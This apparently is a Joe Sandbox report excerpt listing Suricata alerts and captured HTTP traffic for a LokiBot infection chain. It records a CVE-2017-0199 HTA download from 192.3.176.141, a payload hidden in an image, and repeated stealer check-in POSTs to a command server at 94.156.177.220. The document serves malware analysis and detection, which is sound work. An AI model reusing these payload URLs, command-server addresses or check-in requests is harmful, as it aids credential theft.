        Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49204 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49204 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49204 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49204
        Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49236 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49236 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49236 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49236 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49236 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49236
        Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49243 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49243 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49243 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49243 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49243 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49243
        Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49251 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49251 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49251 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49251 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49251
        Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49252 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49252 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49252 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49252 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49252 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49252
        Source: Network trafficSuricata IDS: 2049038 - Severity 1 - ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2 : 142.250.186.97:443 -> 192.168.2.22:49169
        Source: Network trafficSuricata IDS: 2049038 - Severity 1 - ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2 : 142.250.186.97:443 -> 192.168.2.22:49176
        Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur HTTP/1.1Host: drive.google.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /download?id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur&export=download HTTP/1.1Host: drive.usercontent.google.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur HTTP/1.1Host: drive.google.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /download?id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur&export=download HTTP/1.1Host: drive.usercontent.google.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /36/LOGS%20LOKI.txt HTTP/1.1Host: 192.3.176.141Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /36/LOGS%20LOKI.txt HTTP/1.1Host: 192.3.176.141Connection: Keep-Alive
        Source: Joe Sandbox ViewIP Address: 192.3.176.141 192.3.176.141
        Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
        Source: Joe Sandbox ViewASN Name: NET1-ASBG NET1-ASBG
        Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
        Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
        Source: Network trafficSuricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49164 -> 192.3.176.141:80
        Source: Network trafficSuricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49166 -> 192.3.176.141:80
        Source: Network trafficSuricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49174 -> 192.3.176.141:80
        Source: global trafficHTTP traffic detected: GET /uiklDr?&colloquia=wistful&stadium=tangy&earthquake=feigned&official=quizzical&display=fearless&technology=instinctive&feed=abusive&character HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: mpa.liConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /uiklDr?&colloquia=wistful&stadium=tangy&earthquake=feigned&official=quizzical&display=fearless&technology=instinctive&feed=abusive&character HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: mpa.liConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /uiklDr?&colloquia=wistful&stadium=tangy&earthquake=feigned&official=quizzical&display=fearless&technology=instinctive&feed=abusive&character HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: mpa.liConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /uiklDr?&colloquia=wistful&stadium=tangy&earthquake=feigned&official=quizzical&display=fearless&technology=instinctive&feed=abusive&character HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: mpa.liConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /36/bv/seethebestthingstobegoodwithhislifebestthigns.hta HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.3.176.141Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /36/bv/seethebestthingstobegoodwithhislifebestthigns.hta HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Range: bytes=8896-Connection: Keep-AliveHost: 192.3.176.141If-Range: "20a04-6252e4f9e216e"
        Source: global trafficHTTP traffic detected: GET /36/goodthingswithgreatcomebackwithgreatthigns.tIF HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.3.176.141Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /36/bv/seethebestthingstobegoodwithhislifebestthigns.hta HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)If-Modified-Since: Thu, 24 Oct 2024 00:44:54 GMTConnection: Keep-AliveHost: 192.3.176.141If-None-Match: "20a04-6252e4f9e216e"
        Source: global trafficHTTP traffic detected: POST /logs/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F0B98DE8Content-Length: 176Connection: close
        Source: global trafficHTTP traffic detected: POST /logs/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F0B98DE8Content-Length: 176Connection: close
        Source: global trafficHTTP traffic detected: POST /logs/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F0B98DE8Content-Length: 149Connection: close
        Source: global trafficHTTP traffic detected: POST /logs/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F0B98DE8Content-Length: 149Connection: close
        Source: global trafficHTTP traffic detected: POST /logs/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F0B98DE8Content-Length: 149Connection: close
        Source: global trafficHTTP traffic detected: POST /logs/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F0B98DE8Content-Length: 149Connection: close
        Source: global trafficHTTP traffic detected: POST /logs/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F0B98DE8Content-Length: 149Connection: close
        Source: global trafficHTTP traffic detected: POST /logs/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F0B98DE8Content-Length: 149Connection: close
        Source: global trafficHTTP traffic detected: POST /logs/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F0B98DE8Content-Length: 149Connection: close
        Source: global trafficHTTP traffic detected: POST /logs/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F0B98DE8Content-Length: 149Connection: close
        Source: global trafficHTTP traffic detected: POST /logs/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F0B98DE8Content-Length: 149Connection: close
        Source: global trafficHTTP traffic detected: POST /logs/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F0B98DE8Content-Length: 149Connection: close
        Source: global trafficHTTP traffic detected: POST /logs/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F0B98DE8Content-Length: 149Connection: close
        Source: global trafficHTTP traffic detected: POST /logs/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F0B98DE8Content-Length: 149Connection: close
        Source: global trafficHTTP traffic detected: POST /logs/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F0B98DE8Content-Length: 149Connection: close
        Source: global trafficHTTP traffic detected: POST /logs/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F0B98DE8Content-Length: 149Connection: close
        Source: global trafficHTTP traffic detected: POST /logs/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F0B98DE8Content-Length: 149Connection: close
        Source: global trafficHTTP traffic detected: POST /logs/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F0B98DE8Content-Length: 149Connection: close
        Source: global trafficHTTP traffic detected: POST /logs/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F0B98DE8Content-Length: 149Connection: close
        Source: global trafficHTTP traffic detected: POST /logs/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F0B98DE8Content-Length: 149Connection: close
        Source: global trafficHTTP traffic detected: POST /logs/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F0B98DE8Content-Length: 149Connection: close
        Source: global trafficHTTP traffic detected: POST /logs/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F0B98DE8Content-Length: 149Connection: close
        Source: global trafficHTTP traffic detected: POST /logs/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F0B98DE8Content-Length: 149Connection: close
        Source: global trafficHTTP traffic detected: POST /logs/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F0B98DE8Content-Length: 149Connection: close
        Source: global trafficHTTP traffic detected: POST /logs/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F0B98DE8Content-Length: 149Connection: close
        Source: global trafficHTTP traffic detected: POST /logs/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F0B98DE8Content-Length: 149Connection: close
        Source: global trafficHTTP traffic detected: POST /logs/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F0B98DE8Content-Length: 149Connection: close
        Source: global trafficHTTP traffic detected: POST /logs/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F0B98DE8Content-Length: 149Connection: close
        Source: global trafficHTTP traffic detected: POST /logs/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F0B98DE8Content-Length: 149Connection: close
        Source: global trafficHTTP traffic detected: POST /logs/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F0B98DE8Content-Length: 149Connection: close
        Source: global trafficHTTP traffic detected: POST /logs/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F0B98DE8Content-Length: 149Connection: close
        Source: global trafficHTTP traffic detected: POST /logs/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F0B98DE8Content-Length: 149Connection: close
        Source: global trafficHTTP traffic detected: POST /logs/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F0B98DE8Content-Length: 149Connection: close
        Source: global trafficHTTP traffic detected: POST /logs/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F0B98DE8Content-Length: 149Connection: close
        Source: global trafficHTTP traffic detected: POST /logs/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F0B98DE8Content-Length: 149Connection: close
        Source: global trafficHTTP traffic detected: POST /logs/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F0B98DE8Content-Length: 149Connection: close
        Source: global trafficHTTP traffic detected: POST /logs/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F0B98DE8Content-Length: 149Connection: close
        Source: global trafficHTTP traffic detected: POST /logs/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F0B98DE8Content-Length: 149Connection: close
        Source: global trafficHTTP traffic detected: POST /logs/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F0B98DE8Content-Length: 149Connection: close
        Source: global trafficHTTP traffic detected: POST /logs/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F0B98DE8Content-Length: 149Connection: close
        Source: global trafficHTTP traffic detected: POST /logs/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F0B98DE8Content-Length: 149Connection: close
        Source: global trafficHTTP traffic detected: POST /logs/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F0B98DE8Content-Length: 149Connection: close
        Source: global trafficHTTP traffic detected: POST /logs/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F0B98DE8Content-Length: 149Connection: close
        Source: global trafficHTTP traffic detected: POST /logs/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F0B98DE8Content-Length: 149Connection: close
        Source: global trafficHTTP traffic detected: POST /logs/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F0B98DE8Content-Length: 149Connection: close
        Source: global trafficHTTP traffic detected: POST /logs/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F0B98DE8Content-Length: 149Connection: close
        Source: global trafficHTTP traffic detected: POST /logs/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F0B98DE8Content-Length: 149Connection: close
        Source: global trafficHTTP traffic detected: POST /logs/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F0B98DE8Content-Length: 149Connection: close
        Source: global trafficHTTP traffic detected: POST /logs/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F0B98DE8Content-Length: 149Connection: close
        Source: global trafficHTTP traffic detected: POST /logs/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F0B98DE8Content-Length: 149Connection: close
        Source: global trafficHTTP traffic detected: POST /logs/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F0B98DE8Content-Length: 149Connection: close
        Source: global trafficHTTP traffic detected: POST /logs/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F0B98DE8Content-Length: 149Connection: close
        Source: global trafficHTTP traffic detected: POST /logs/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F0B98DE8Content-Length: 149Connection: close
        Source: global trafficHTTP traffic detected: POST /logs/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F0B98DE8Content-Length: 149Connection: close
        Source: global trafficHTTP traffic detected: POST /logs/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F0B98DE8Content-Length: 149Connection: close
        Source: global trafficHTTP traffic detected: POST /logs/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F0B98DE8Content-Length: 149Connection: close
        Source: global trafficHTTP traffic detected: POST /logs/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F0B98DE8Content-Length: 149Connection: close
        Source: global trafficHTTP traffic detected: POST /logs/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F0B98DE8Content-Length: 149Connection: close
        Source: global trafficHTTP traffic detected: POST /logs/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F0B98DE8Content-Length: 149Connection: close
        Source: global trafficHTTP traffic detected: POST /logs/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F0B98DE8Content-Length: 149Connection: close
        Source: global trafficHTTP traffic detected: POST /logs/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F0B98DE8Content-Length: 149Connection: close
        Source: global trafficHTTP traffic detected: POST /logs/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F0B98DE8Content-Length: 149Connection: close
        Source: global trafficHTTP traffic detected: POST /logs/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F0B98DE8Content-Length: 149Connection: close
        Source: global trafficHTTP traffic detected: POST /logs/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F0B98DE8Content-Length: 149Connection: close
        Source: global trafficHTTP traffic detected: POST /logs/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F0B98DE8Content-Length: 149Connection: close
        Source: global trafficHTTP traffic detected: POST /logs/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F0B98DE8Content-Length: 149Connection: close
        Source: global trafficHTTP traffic detected: POST /logs/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F0B98DE8Content-Length: 149Connection: close
        Source: global trafficHTTP traffic detected: POST /logs/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F0B98DE8Content-Length: 149Connection: close
        Source: global trafficHTTP traffic detected: POST /logs/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F0B98DE8Content-Length: 149Connection: close
        Source: global trafficHTTP traffic detected: POST /logs/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F0B98DE8Content-Length: 149Connection: close
        Source: global trafficHTTP traffic detected: POST /logs/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F0B98DE8Content-Length: 149Connection: close
